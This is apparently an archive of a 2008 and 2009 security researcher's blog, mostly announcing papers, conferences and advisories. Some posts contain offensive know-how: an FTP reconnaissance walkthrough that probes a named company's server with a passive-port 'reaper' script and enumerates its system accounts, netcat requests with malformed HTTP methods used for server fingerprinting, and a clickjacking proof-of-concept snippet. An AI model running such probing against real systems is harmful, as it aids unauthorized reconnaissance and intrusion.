(*) http_X_enum.pl - HTTP[X] protection enumerator
(*) enumerates (clickjacking,mime sniffing,xss protection, content download , csp etc) applied defense.
(*) web application security assessment script
(*) written by 0kn0ck [at] secniche.org

(*) checking the state of server through icmp requests.
(*) yahoo.com is subjected to be alive

[+] +++++++++++++++++++++++++++++++++++++++++++++++++++
[+] checking for applied defense on domain : yahoo.com
[+] +++++++++++++++++++++++++++++++++++++++++++++++++++

[-] http parameter [X-XSS-Protection: 0] not detected.
[-] http parameter [X-XSS-Protection: 1] defense is not applied at domain.
[-] http parameter [X-FRAME-OPTIONS: DENY] clickjacking defense is not applied
[-] http parameter [X-FRAME-OPTIONS: SAMEORIGIN] clickjacking defense is not applied
[-] http parameter [X-CONTENT-TYPE-OPTIONS: NOSNIFF] mime handling-sniffing opt out is not applied
[-] http parameter [X-DOWNLOAD-OPTIONS: NOOPEN ] mime handling- download force save is not applied
[-] http parameter [X-CONTENT-SECURITY-POLICY: ALLOW SELF] content policy is not applied.
[-] http parameter [X-CONTENT-SECURITY-POLICY: ALLOW https://self] content policy is not applied.
[-] http parameter [ACCESS-CONTROL-ALLOW-ORIGIN] csrf origin access is not applied.

=====================[DEBUG]=====================

HTTP/1.1 301 Moved Permanently
Date: Wed, 25 Nov 2009 02:42:40 GMT
Location: http://www.yahoo.com/
Cache-Control: private
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8

95 The document has moved here.
0

==================[DEBUG]======================

[+] execution success.

The script posed the appropriate results looking at the two different domains. But one thing is sure that Google is not at all in coherence with Microsoft steps.

Hakin9 - Extended Edition (Best Of) Featured Papers

2009-09-28T09:25:00.000-07:00

Hakin9 has released an extended edition which features the some of the best articles that are chosen by the readers and the team itself. Two articles have been placed in it:

1. Auditing Oracle in Production Environment
2. Reverse Engineering Binaries

You can look some of the papers at:

http://hakin9.org/magazine/article

Enjoy !

Infosecurity Article : "Ethical Hacking in Business World"

2009-09-19T10:41:00.000-07:00

InfoSecurity has published a new article on the on going industry trends of ethical hacking and its differential behavior in business world.

This article reflects a thoughtful process of ongoing security practices and business dependency considering the feasibility of core technology. The security jargon is stemming up with a high pace compromising all the barriers. The business sphere is getting increasingly dependent on the automation processes. All the monetary transactions and high end functionality is based on computers. But the positive side is always accompanied with the negative side too.

For more visit

http://fanaticmedia.com/infosecurity/archive/Sep09/Ethical%20Hacking.htm

FTP Anonymous Services - User Enumeration and Reconnaisance

2009-08-06T11:07:00.000-07:00

The security is termed to be as a closed asset for any organization. It has been noticed in recent times that many of the business vendor allows certain anonymous access to the services running on their server. The concern of this post is not restricted to one part but looking at the diversified impact. Apparently the issue seems small but the resultant impact is high. Anything with a default or anonymous access is potentially critical. For example:- the most common issue is FTP open access. Many of the organizations allow anonymous access without understanding the consequences that may hamper the normal functioning.

There are certain facts:

1. A vendor has to restrict the open services.
2. A vendor has to provide a standard access to the clients even for the simple download. Now days, it is not considered as an appropriate solution for providing open access to services. Even for the business perspective restricted access should be taken into consideration. Why open FTP? Why not a credential based access?
3. If the services has to be given then scrutinize the deployment strategy whether it has to be applied at internet or intranet.
4. Why not to put these services on VPN considering the business need.
5. The configuration against these deployed services. Why not to use the organization specific policy based password for FTP access. Why anonymous?
6. Open services are tactically exploited to gain information and reconnaissance.
7. These can be used to scan third party targets too.

Question: Is Security a Prime Target or Business?
Answer: Individualistic and Organizational Decision. Diversified impacts.

Let's consider a case and a risk emanating from it. For example - an organization is providing an open access to FTP services. We will be considering specific functions from security point of view:

1. Passive Mode
2. Glob() Global

"Most FTP daemon implementations provide server-side globbing functionality that performs pattern expansion on these pathnames. The actual glob() implementation is often located in the FTP daemon itself,though some FTP servers use an underlying libc implementation."

"glob - Toggle file name globbing. When file name globbing is enabled, ftp expands csh(1) metacharacters in file and directory names. These characters are *, ?, [, ], ~, {, and }. The server host expands remote file and directory names. Globbing metacharacters are always expanded for the ls and dir commands. If globbing is enabled, metacharacters are also expanded for the multiple-file commands mdelete, mdir, mget, mls, and mput."

If an FTP server provides anonymous access with a passive mode on are more vulnerable
toFTP Bounce Attacks.

Glob() function can be tested against number of buffer overflow issues. The ability of a remote or local user to deliver input patterns to glob() implementations allows
risk of exploitation once the vulnerability is exploited.

Let;s have a look at the real world scenario : Analysis of uptime software. A complete thought oriented and for knowledge purposes.

Administrator@TopGun ~
$ ftp uptimesoftware.com
Connected to uptimesoftware.com.
220 uptime software FTP services
Name (uptimesoftware.com:Administrator): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> passive
Passive mode on.
ftp> debug
Debugging on (debug=1).
ftp> glob
Globbing off.
ftp> glob on
Globbing on.

ftp> dir
---> PASV
227 Entering Passive Mode (216,220,63,213,73,192)
---> LIST
150 Here comes the directory listing.
-rw-rw-r-- 1 501 501 148181 Feb 07 2008 BMO and uptime software.pdf
drwxrwxr-x 2 501 501 4096 Jun 23 19:08 CVS
lrwxrwxrwx 1 501 501 33 Dec 02 2008 ReleaseNotes_up.time5.pdf -> ../pdfs/ReleaseNotes_up.time5.p
df
lrwxrwxrwx 1 501 501 37 Dec 02 2008 ReleaseNotes_up.time5_SP1.pdf -> ../pdfs/ReleaseNotes_up.tim

So its easy to look at the rights configured for different user groups.

Administrator@TopGun /cygdrive/c/scripts
$ perl pasvagg.pl uptimesoftware.com
:: connected to uptimesoftware.com
>> 220 uptime software FTP services
:: logging into server as anonymous.
>> 331 Please specify the password.
>> 230 Login successful.
>> 227 Entering Passive Mode (216,220,63,213,89,62)
:: server ready for passive attack
:: sampling passive port selection
:: passive connection rate = 6259.7/sec
:: passive command latency = 0.4 seconds
:: starting the reaper engine

:: starting port 17200

Based on one of my designed script , lets analyze the reaped information
Administrator@TopGun /cygdrive/c/my_tools
$ perl ftp_user_reconnaisance.pl uptimesoftware.com
ftp_user_reconnaisance.pl - ftp based system user reconnaisance
written by- 0kn0ck [at] secniche.org

(*) resolving the generic address for domain: uptimesoftware.com
(!) 216.220.63.213

(*) detecting nameservers for the domain : uptimesoftware.com
(!) ns4-auth.q9.com
(!) ns1-auth.q9.com
(!) ns3-auth.q9.com
(!) ns2-auth.q9.com

(*) trying anonymous access on - uptimesoftware.com
(*) anonymous access allowed - uptimesoftware.com
(*) uptimesoftware.com does not support TLS

(*) trying to enumerate the configured system accounts on - uptimesoftware.com

[conn str - 0] - [temp] is not a standard system configured user
[conn str - 1] - [root] is a standard system configured user
[conn str - 2] - [bin] is a standard system configured user
[conn str - 3] - [daemon] is a standard system configured user
[conn str - 4] - [adm] is a standard system configured user
[conn str - 5] - [lp] is a standard system configured user
[conn str - 6] - [sync] is a standard system configured user
[conn str - 7] - [shutdown] is a standard system configured user
[conn str - 8] - [halt] is a standard system configured user
[conn str - 9] - [mail] is a standard system configured user
[conn str - 10] - [news] is a standard system configured user
[conn str - 11] - [uucp] is a standard system configured user
[conn str - 12] - [operator] is a standard system configured user
[conn str - 13] - [games] is a standard system configured user
[conn str - 14] - [gopher] is not a standard system configured user
[conn str - 16] - [apache] is not a standard system configured user
[conn str - 17] - [named] is not a standard system configured user
[conn str - 18] - [amanda] is not a standard system configured user
[conn str - 19] - [indent] is not a standard system configured user
[conn str - 20] - [rpc] is not a standard system configured user
[conn str - 21] - [wnn] is not a standard system configured user
[conn str - 22] - [xfs] is not a standard system configured user
[conn str - 23] - [pvm] is not a standard system configured user
[conn str - 24] - [ldap] is not a standard system configured user
[conn str - 25] - [mysql] is not a standard system configured user
[conn str - 26] - [rpcuser] is not a standard system configured user
[conn str - 27] - [nsf] is not a standard system configured user
[conn str - 28] - [nobody] is a standard system configured user
[conn str - 29] - [junkbust] is not a standard system configured user
[conn str - 30] - [gdm] is not a standard system configured user
[conn str - 31] - [squid] is not a standard system configured user
[conn str - 32] - [nscd] is not a standard system configured user
[conn str - 33] - [rpm] is not a standard system configured user
[conn str - 34] - [mailman] is not a standard system configured user
[conn str - 35] - [radvd] is not a standard system configured user
(*) command completed successfully

The only point in presenting these facts with an example is to show the risks posed
and the impact on security.

At last : Why not a mature business with hardened security?

Elsevier - CFSJournal - Breaches in Security Vendor Websites

2009-08-06T10:56:00.000-07:00

A new article on "Security breaches in vendor websites" have been released in Elsevier's Computer Fraud and Security Journal.

The security business model revolves around security entities and those security service providers that ensure implementation of secured mechanisms in every aspect of deployment. But how mature are those businesses' own security models? We will evaluate various instances of breaches in security companies and how they occur. The world has seen a number of cases like Kaspersky, F-Secure, a reseller for BitDefender, and so on. There are a number of cases that have not been released publicly. Why is this happening, and what is the root cause? More ........

LINK

Regards

Hakin9 Edition - Article and Self Exposure Interview

2009-07-17T23:58:00.000-07:00

Hakin9 has published an article on "Hacking through Wild Cards" This paper sheds light on the usage of wild characters that lead to hacking. The wild characters are used effectively in a different sphere. The inappropriate use of wild characters can lead to misconfiguration of parameters thereby resulting in a number of attacks.

In addition to that , An interview has been published in prime "Self Exposure" section.

you can look into the issue at:

http://hakin9.org/prt/view/about-the-mag/issue/1052.html

Regards

SyScan 09 Conference - Wrap Up

2009-07-17T23:25:00.000-07:00

SyScan is Asia's one of the prime conference. This year conference has a great set of talks by most good guys in security field. We organized an ICANPWN contest at SyScan this year. There were lot of good content and new discoveries by researchers. Usually we noticed a indispensable research on virtualization. Outspect tool for live memory analysis of virtual machines from host OS. Outbound. Mr. Quynh has created this tool.
In relation to that there was lot of good stuff on PHP,JAVA , CITRIX, BIOS etc. Overall the conference comes out with a great knowledge , thats what it is aim for.

The CTF stuff was cool and organized by White Wolf Security.Thanks to Thomas for organizing such a conference.

If you miss the fun , you can watch some stuff here:

PICS

Regards

Elsevier - Is Your System Pwned

2009-06-11T06:23:00.000-07:00

Elsevier has released a new article as "Is your system pwned".

Article Overview:
"What is the relationship between humans, technology, and fraud? They are all linked together in a triangle. Most monetary transactions today are carried out using digital technologies, most frauds are monetary, and all frauds are perpetuated by people. As fraud prevention experts, we try to break the triangle – to ensure that people don’t interact with technology to create fraudulent situations."

Link to Journal

Regards

Gmail/Google Doc PDF Repurposing Integrated Attacks - Cookie Hijacking / Stealing

2009-05-11T07:11:00.000-07:00

Google docs network was vulnerable to PDF repurposing attacks. The vulnerability was disclosed to Google with a discretion. This was done to mitigate the risk. Google had worked over it and patched it with in a period of 5 days.

The Google doc has been refined now and the integrated support for adobe plugin is removed. The user security was the prime issue because millions of user were at risk if this attack persisted in the open environment. Integrated accounts were more susceptible as certain stolen credentials could be used to access accounts.

The advisory is released here:
http://secniche.org/gmd_hijack/gc_hijack.xhtml
http://secniche.org/gmd_hijack/advisory_gmail_google_docs_pdf_repurposing_attack.pdf

Regards

Troopers 09 Security Conference

2009-05-02T08:23:00.000-07:00

The troopers security conference is the one of the finest conference I have been to. Its very nice to have such conference in the heart of Germany. a great technical content and nice crew to discuss things and hang around :). I gave a talk on "Browser Design Flaws". There were some good talks around rootkits , malware for business purposes and web application firewall stuff. All talks were good and it was a great learning environment. Visit :Troopers09

Personally I liked the Packet Wars Hacking Competition by Bryan. It was nicely organized. You can look at the stuff at : Packet Wars Good hacking games to enjoy.

If you miss the fun you can have a look at the snaps here : Troopers09 fun

Regards

Google Chrome Alert Single Thread Out of Bound Denial of Service Vulnerability

2009-04-11T01:56:00.000-07:00

The vulnerability reported to Google is not appropriately understood.There is more discussion required on it. The vulnerability link is provided below:-

http://secniche.org/gcalrt.html

The denial of service condition persists efficiently with the reported version.

When this vulnerability is triggered , following output is undertaken:

1. The browser gets in locked state and becomes unresponsive. The user
can not perform any operation
2. It is not only restricted to single tab but it impacts all the opened windows.
3. Process killing is the only solution left.

This works perfectly fine on Windows XP platform.

Note: The new version of Google Chrome is also Vulnerable.

All views are welcomed for any type of discussion.

Browsers Behavior : Handling Carriage Return "window.open('\r\n\r\n');" JavaScript Calls

2009-03-31T21:51:00.000-07:00

The carriage return and null characters are considered to be as a potential elements of testing behavior of various programs. This works efficiently with different browsers too. The resultant output is quite stringent in relation to the normal behavior that must be shown by the browsers. The Carriage Return (CR) encompass Line Feed and New Line characters as a basic part. As per the standard fact

"carriage return character, alone or with a line feed, to signal the end of a line of text, but other characters are also used for this function (see newline); others use it only for a paragraph break (a hard return)"

Based on this fact a number of tests have been conducted on different browsers. These characters are passed as an argument to javascript:window.open() function to notice the behavior of the new window. It can be used as one of the fuzzed input for testing browser dependencies. Based on this artifact one of the Google Chrome advisory was released. The links are mentioned below:

http://www.securityfocus.com/bid/31375

http://www.symantec.com/business/security_response/attacksignatures/detail.jsp?asid=23189

http://osvdb.org/show/osvdb/48680

http://www.secniche.org/gcrds.html

That was the vulnerability noticed in Google Chrome and was patched by the vendor. The behavior that is noticed all the time with different browsers are:-

1. Mozilla Firefox opens bundle of windows in single stretch.
2. Google Chrome open number of windows too.

Note: We are not considering loops here but only carriage return character. some stability has been added because presence of Pop UP blockers stops the execution
of these child windows.

We have noticed this differential responses from number of browsers. I think the CR is good element to be used for fuzzing. The browsers behavior is hard to control considering the issue presented above.

Regards

Internet Explorer 8 - Anti Spoofing is a Myth

2009-03-25T11:39:00.000-07:00

With the new features implemented in IE 8, the status address bar has been transformed too. The new step taken by Microsoft IE team that is not to show the address of selected link in a status bar can have a serious impact. A user
will not be able to see the active link in the status bar. This looks like to be an implementation of security solution with an obscurity. Status bar is required for Link Integrity check that assures a user about the legitimate website. We are
not considering the ingrained vulnerabilities of status address bar spoofing in browsers at this point of time.

For more details:- http://secniche.org/ie_spoof_myth/

Regards
0kn0ck

Elsevier - NESE Journal - From Vulnerability to Patch

2009-03-14T06:37:00.000-07:00

Elsevier has published a new thought article on "From Vulnerability to Patch" in Network Security Journal.

http://www.elsevierscitech.com/nl/ns/home.asp

As per the standards this Journal is not available freely , you need to subscribe it.

Regards
0kn0ck

Evading Web XSS Filters through Word (Microsoft Office and Open Office) in Enterprise Web Applications

2009-03-12T03:36:00.000-07:00

This paper sheds light on the hyper linking issues observed during penetration testing of web based enterprise applications. This concept can be used to bypass standard XSS filters by creating a malicious Microsoft word document.

Download the Paper at : HERE

Regards
0kn0ck

Mapping HTTP Interface Embedded Devices

2009-02-28T09:50:00.000-08:00

Hakin9 has published a new paper. This paper discusses the generic approach of detecting the HTTP interface of embedded devices. These devices perform a number of different functions based on the infrastructural need.

Check

Regards
0kn0ck

Informer - Hacking for Charity

2009-02-28T09:35:00.000-08:00

Its matter of immense pleasure that researchers all over the world are getting collaborated together for the cause of charity. Be a part of it. Its a very good initiative by Johnny Long. We appreciate his concern and Secniche will be a pure part of it.

This is a sincere request for all talent all around to play your part in it.

About Informer:
"The Informer is a fund raising effort run by Hackers For Charity. It is designed to give subscribers a "backstage pass" to the world of Information Security."

Informer - Why?

Hackers for Charity

Get on the same boat for a great cause.

Regards
0kn0ck

Obfuscated HTTP Method Call based Fingerprinting Analysis

2009-02-24T05:23:00.001-08:00

Fingerprinting of web servers can be done in different ways. It has been noticed that the HTTP methods are not interpreted in an appropriate manner by number of web servers. It can be seen while fuzzing web servers ( if the particular HTTP method is included ). With the advent of new scripting languages number of different web servers are in a race. Let's first look at the some of the web servers which are in use now a days. The list is under mentioned:-

[Zope Web Server]Zope is an open source application server for building content management systems, intranets, portals, and custom applications. The Zope community consists of hundreds of companies and thousands of developers all over the world, working on building the platform and Zope applications. Zope is written in Python, a highly-productive, object-oriented scripting language.

[Mongrel Web Server]
Mongrel is a fast HTTP library and server for Ruby that is intended for hosting Ruby
web applications of any kind using plain HTTP rather than FastCGI or SCGI.

[Jetty]
Jetty is an open-source, standards-based, full-featured web server implemented entirely in Java.

These are number of web servers which are used in open source development extensively. The IIS and Apache (different variants)are always on the role.

The point that needs to be scrutinized is the request acceptance by the web server and the ability of open source web servers to understand the HTTP method properly. The IIS and Apache are efficient in handling rogue requests. But other web servers fail to instantiate this kind of behavior( interpreting HTTP requests efficiently].

This talk serves over two basic principles:

1. Effectiveness and Pervasiveness of Web servers in interpreting the HTTP Call Method.
2. Type of response send by the server.
3. The type of exceptions occur.

There are number of tools that fingerprint web servers. There is no doubt that 70% of web servers deployed globally can be traced by fetching banners. But our aim is to perform fingerprinting with minimum information. That's where fuzzing becomes really critical. We have critically examined the behavior of under mentioned entities and their collective use to fingerprint web servers.

1. Rogue HTTP Method Call Invocation.
2. Long String of /\/\/\/\/\/\/\/\ Expression.

We have used back slash character. According to regular expression and pattern matching theory the backslash character can be used for following purposes.

1) stand for itself,
2) quote the next character,
3) introduce an operator,
4) do nothing.

It depends a lot in the context in which backslash character is used. We will see the behavior of number of web servers when a specific request is sent.

$ nc www.example.com 80
JAG /\/\/\/\/\/\/\/\/\ HTTP/1.0

HTTP/1.1 404 Not Found
Date: Tue, 24 Feb 2009 13:48:37 GMT
Server: Mongrel 1.1.3
Status: 404 Not Found
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 708
Set-Cookie: _session_id=5537174372e814e02fee588aa67c4a2a; path=/
Connection: close

It responds with HTTP/1.1 specification and 404 (The server has not found anything matching the URI given )Not Found. That's right. Another point that should not be neglected in Mongrel web servers is that it adds a Status parameter in a response. This behavior is only shown by the Mongrel web server. On the contrary the server does not point out the HTTP method used for call invocation.

$ nc example.org 80
JAG /\/\/\/\/\/\/\/\ HTTP/1.0

HTTP/1.1 405 Method Not Allowed
Date: Tue, 24 Feb 2009 13:53:29 GMT
Server: Jetty/5.1.14 (SunOS/5.10 x86 java/1.6.0_03
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: xn_visitor=4537fb13-e021-4cdb-bb50-4e3a8bfbb6fa;Path=/;Domain=.z1014
ba.ningops.com;Expires=Fri, 22-Feb-19 13:53:29 GMT
X-XN-Trace-Token: 8702916f-3dbd-4d51-978c-06abbe2adf73
Allow: GET, HEAD, POST, PUT, DELETE, MOVE, OPTIONS, TRACE
Content-Type: text/html
Content-Length: 1246
Connection: close

The Jetty web server responds back 405 (the client has tried to use a request method that the server does not allow.The method specified in the Request-Line is not allowed for the resource identified by the Request-URI. The response MUST include an Allow header containing a list of valid methods for the requested resource). As Jetty is written in Java the HTTP methods are always configured most of the time which are allowed to be executed.

For Zope server we will consider two cases as structured below.

$ nc example.com 80
JAG /\ HTTP/1.0

HTTP/1.1 200 OK
Date: Tue, 24 Feb 2009 14:11:37 GMT
Server: Zope/(Zope 2.9.6-final, python 2.4.4, linux2) ZServer/1.1 Plone/2.5.1
Content-Length: 59
Content-Type: text/plain; charset=iso-8859-15
Via: 1.0 www.example.com
Connection: close
webdav.NullResource.NullResource object at 0x2aaaacda0b18

The server responds back with 200(the request is fulfilled) OK response code. There is an null pointer exception too at the end. Let's look at the different layout

$ nc example.org 80
JAG /\/\/\/\/\/\ HTTP/1.0

HTTP/1.1 404 Not Found
Date: Tue, 24 Feb 2009 14:03:42 GMT
Server: Zope/(Zope 2.9.6-final, python 2.4.4, linux2) ZServer/1.1 Plone/2.5.1
Bobo-Exception-Line: 66
Content-Length: 1403
Bobo-Exception-Value: See the server error log for details
Bobo-Exception-File: NullResource.py
Bobo-Exception-Type: NotFound
Content-Type: text/html; charset=iso-8859-15
Via: 1.0 www.example.com
Connection: close

We are not considering the exceptions here. You can see the server responds back with 404(This status code is commonly used when the server does not wish to reveal exactly why the request has been refused, or when no other response is applicable.)
The response is different with string manipulation. The ambiguity is there or the code does not handle the request effectively.

Let's try this behavior for Microsoft IIS and Apache

$ nc microsoft.com 80
JAG /\/\/\/\/\/\/\ HTTP/1.0

HTTP/1.1 501 Not Implemented
Content-Length: 0
Server: Microsoft-IIS/6.0
P3P: CP='ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo C
NT COM INT NAV ONL PHY PRE PUR UNI'
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Tue, 24 Feb 2009 14:06:06 GMT
Connection: close

The response code is 501(The server does not support the functionality required to fulfill the request. This is the appropriate response when the server does not recognize the request method and is not capable of supporting it for any resource). It is quite perfect as per the desired logic.

$ nc apache.org 80
JAG /\/\/\/\/\/\ HTTP/1.0

HTTP/1.1 501 Method Not Implemented
Date: Tue, 24 Feb 2009 14:50:58 GMT
Server: Apache/2.2.9 (Unix)
Allow: GET,HEAD,POST,OPTIONS,TRACE
Vary: Accept-Encoding
Content-Length: 337
Connection: close
Content-Type: text/html; charset=iso-8859-1

The same result is returned by Apache as 501. The differential pattern is under mentioned as:

IIS Server Response String -- HTTP/1.1 501 Not Implemented
Apache Server Response String -- HTTP/1.1 501 Method Not Implemented

The word "method" is not present in the IIS response. This is a generic behavior.

The most widely used web servers track down the HTTP method invocation check which is quite missing in other web servers. Two points arise:-

1. Do web server implements a check on HTTP Method Call Invocation?
2. Are web servers processing request based on URI only ?

This all depends on the web server development. Lets try this logic on proxies:

$ nc example.org 80
JAG /\/\/\/\/\/\ HTTP/1.0

HTTP/1.0 400 Bad Request
Server: squid/2.7.STABLE6
Date: Tue, 24 Feb 2009 14:00:52 GMT
Content-Type: text/html
Content-Length: 1207
X-Squid-Error: ERR_INVALID_REQ 0
X-Cache: MISS from cache5.zmh.zope.net
Via: 1.0 cache5.zmh.zope.net:8300 (squid/2.7.STABLE6)
Connection: close

The proxy server responds back with 400 Bad Request with same HTTP/1.0. The proxy
intercepts and scrutinize the HTTP method and URI request at the perimeter level.

The behavior is again different if compared to web servers. This analysis lay stress on the HTTP Method call check which is required to prune down the fingerprinting process based on this factor.

If all web servers responds back with 501 code then it should be consider as a unanimous behavior among different web browsers.

Regards
0kn0ck

More Towards Clickjacking - Simulating Positive Trends

2009-02-01T04:32:00.001-08:00

Clickjacking. You will find number of definitions about this attack. In generalized manner it is a kind of attack that simulate not only MOUSE EVENTS, while performing malicious operations but also hijacking of user interface components that are displayed by a specific site.

Usually, the aim is to trap the handling of hidden events, when a mouse is clicked over the user interface component such as buttons.I am considering all types of web based variants that can be triggered through browsers. The point of dissemination about clickjacking is to scrutinize the behavior of user interfaces(buttons). The events can be generated dynamically or manually. When an user interface is clicked , a hidden event is executed at the back.

A recent simple POC which was released based on this concept. The proof of concept revolves around the activation of a code (div) through a generic mouse event that binds to hidden structure with div tags. We are not actually sticking to general JavaScript call i.e. location.href. It is used as a one part but what is more interesting, is the pure use of hidden event through mouse clicking, which triggers it. The proof of concept clearly defines that. The clickjacking POC is a very simple variant to just show the browser request handling. More devastated actions can be performed where user authentication is required.

Well it is quite view specific here. The major trend revolves around:

1. Execution of hidden frames by triggering mouse interface with components(buttons).
2. Mouse coordinates play even a critical role to match the positions.

The coordinates function:

function clickjack_armor(evt)
{
clickjack_mouseX=evt.pageX?evt.pageX:evt.clientX;
clickjack_mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById('mydiv').style.left=clickjack_mouseX-1;
document.getElementById('mydiv').style.top=clickjack_mouseY-1;
}

When we are talking about hidden, we use DIV tags or other manually drafted codes to generate hidden frames.

3. The victims has to be trapped..

If we consider this definition of clickacking
"A clickjacked page tricks a user into performing undesired actions by clicking on a concealed link. On a clickjacked page, the attackers show a set of dummy buttons, then load another page over it in a transparent layer. The user thinks he is clicking the visible buttons, while he/she is actually performing actions on the hidden page"

Clickjacking is based on a similar principle: to convince the end user to provide information that does not seem to have any value to the user, but factually has power over the user's assets or ID, if applied in a particular context.

Again I think real issue behind clickjacking have been clearly on the cards.I sincerely feel that the SecTheory has given a clear explanation here:ClickJacking Paper.

Rest its a browser issue and the events can be triggered in a number of ways. Browser interaction with users always at the verge of exploitation. So this is a threat and we have to collaborate in working against it.

Security is a prime motive so lets drive by it.

Cheers

BCS Article - Scrutinizing Business Logic

2009-01-22T01:13:00.000-08:00

The British Computer Society has published a new article on business logic written by secniche. The article revolves around:

The vulnerability pattern is shifting more towards application level and attackers are concentrating more on exploiting web applications rather system level insecurities. The high end attacks used to start with XSS and SQL injections, but the paradigm has shifted more towards business logic flaws.

For detailed article:

http://www.bcs.org/server.php?show=ConWebDoc.24009&changeNav=8265

Regards
0kn0ck

Hakin9 Issue Jan-Feb 2009 - New Paper Published

2009-01-22T01:06:00.000-08:00

The new paper related to "Hacking IM encryption Flaws" have been published in Hakin9 issue. This paper sheds a light on encryption problems in Instant Messaging client’s primary memory which lead to hacking. The IM clients have been used extensively all over the world to exchange messages between different parties.

For more details: http://hakin9.org/prt/view/about-the-mag/issue/959.html

Regards
0kn0ck

Clubhack 2008 Security Conference

2008-12-11T01:59:00.000-08:00

Secniche security has presented on client side hacking at clubhack 2008 security conference. you can find all info at :

http://www.clubhack.com

0kn0ck

XCON and XKUNGfoo Security Conferences

2008-12-11T01:53:00.000-08:00

Hi

The secniche security has presented two talks on china's most efficient hacking
and security conferences. The XCON is prime conference organized by XFOCUS group. This year there are very good talks which enlightens up the crowd with new techniques on security.

The xcon talk has been made online at http://www.secniche.org/events.html

The xkungfoo has not been released due to some reasons.

XCON : http://xcon.xfocus.org
Xkungfoo : http://www.xkungfoo.org

Enjoy

0kn0ck

WindowSecrets.com - Improve Security by Running Applications in Isolation

2008-10-13T04:04:00.000-07:00

Windows Secret portal has published a new article on "Improve Security by Running Applications in Isolation". The article describes the positive functionality of running applications in isolation. The released Mozilla vulnerability has taken as one of the specific browser issue in it.

Read paper at:
READ

Regards
0kn0ck

Google Chrome Memory Exhaustion Bug

2008-09-27T10:11:00.000-07:00

A new Google Chrome memory exhaustion bug has been release at SecNiche Security. Fidn the detail here:

http://secniche.org/gcrds.html

Additional Links and News:

http://blogs.zdnet.com/security/?p=1975
http://www.chromeplugins.org/chrome/chrome-memory-exaustion-dos-vulnerability/
http://milw0rm.com/exploits/6554
http://www.heise.de
/security/DoS-Schwachstelle-bringt-Googles-Chrome-zu-Fall--/news/meldung/116526

and so....

Regards
0kn0ck

Hakin9 Release - Auditing Rich Internet Applications - Testing RIA Strategically

2008-09-10T01:57:00.000-07:00

This research deals with insecurities in designing FLEX based applications from a developer perspective. The application's behavior depends on code written at the backend. It has been noticed that most of an application's flaws are the outcome of insecure or bad code.

http://hakin9.org/prt/view/about-the-mag/issue/893.html

Regards
0kn0ck

Hackonic - The Hacker Way of Writing

2008-08-23T03:12:00.000-07:00

This project is dedicated to hacker way of writing. The aim is to present the creative thinking of hacker over social layout. The art resides everywhere. So its a duty to craft it and to present in front of comunnity.

Hackonic - Leveraging the Hidden thinking process.

HACKONIC

Regards
0kn0ck

Restating JSON Hijacking - Call Back Pattern Checks

2008-08-21T19:44:00.000-07:00

Recently I was going through the Web application List and found a post on JSON Hijacking. The issue of spreadsheet was briefly discussed. The prime target to hit the Callback Pattern working functionality which is also undertaken as JSON Padding which is considered insecure.So here are some of the papers and discussion which will explore this concept at max.

[1] http://www.secniche.org/papers/Exploiting_JSON_7_Attack_Shots.pdf

[2] http://www.secniche.org/papers/Ser_Insec_Bison.pdf

[3] HP Blog

Regards
0kn0ck

God Dwells in Machine - The Transformation

2008-08-16T11:19:00.000-07:00

With the advent of new technology entities and objects , the face of world has changed. Ever since the development takes place there is always a forefather adhere to it. Not even a single discovery can be made without the originator. When it comes to nature, god is there. When it comes to machines the answer really gets hard to find. God resides in Machine ! Is it possible? A little sarcastic question to ask but still it holds a abstract truth which one can not deny.

A very generic views have been presented. Fetch here and think of your own:

God Dwells in Machine.

Regards

Tomcat-Apache Passsword Information Dumps

2008-08-16T11:15:00.000-07:00

The web is a platform for launching number of attacks in different environment. It is not so easy to directly trigger the pattern of insecurity and exploit the dynamic entities. The web itself holds tremendous information. This information should be managed and tackled in a right way. Again the administration is a big problem. Well it is. While pen testing Apache tomcat it is undertaken that the security is implemented in a worst way. Most of the time weak passwords and poorly generated modules and misconfigurations lead to control.

Note: 50 % of Apache Tomcat servers can be hacked in easy manner if security is slithered. A brief analysis after a collection of dumps is discussed. Have a look:

CERA Arena

Regards

Shakacon 2008 Hawaii USA Presentations are Online

2008-07-31T23:40:00.000-07:00

The Shakacon conference presentations have been made online. The PDF presentation which is a mirror of my previous presentation have been released at shakacon website. You can download presentations:

ShakaCon 2008

The Shakacon is Hawaii is most prominent conference on security.

Enjoy the things !

Regards
0kn0ck

SNS08-01 Whitepaper - Paranormal Fallacy - SE Automated Scanning Anomaly.

2008-07-05T23:29:00.000-07:00

This paper will discuss the anomaly behavior of Google search engine that affects the working of automated scanning tools. This anomaly can be considered as a security mechanism implemented by Google to prevent number of search queries to be executed by a single host within a specific time limit. Due to this factor the scanning functionality of number of tools is disrupted.

FETCH

Regards

Hakin9 Paper : Hacking RSS Feeds - Insecurities in Implementing RSS Feeds

2008-06-30T07:29:00.000-07:00

This paper sheds light on the insecure coding practices that affect RSS based web applications and also on their flexibility. The advent of Web 2.0 has enhanced the mobility of content. The inclusion of content has become the sole basis for the inter-working of websites.

RSS feeds are used extensively. This serves as an interdependent working platform. But during penetration testing sessions, PHP based RSS applications show vulnerable behavior due to insecure coding. As a result of this, web application robustness is affected. This layout is versatile from a security point of view as well as from a working structure of applications. This paper discusses the infection vectors that occur due to insecure coding by developers and includes other related security issues. It will provide a detailed analysis of the errors and efficient measures to correct those errors, while keeping in mind the original security concerns.

You can have a look : Hakin9 / 4th Issue / 2008

Regards
0kn0ck

Leading Security Team at Evil Fingers Community

2008-06-23T07:02:00.000-07:00

EvilFingers aims at uniting different pieces of information into one unanimous framework, where everything is mapped to everything else. This approach helps analysts, engineers, consultants and the management to understand the meaningful relationships between different parts of Information Security that could be lost if it remains untouched. Security has been there for several thousand years and yet when humans try deploying the same in different forms, there are several possibilities of misinterpretations that make it even harder to attain complete security. Our mission that we have chosen is to bring in as many resources as possible into one single roof to help this community.

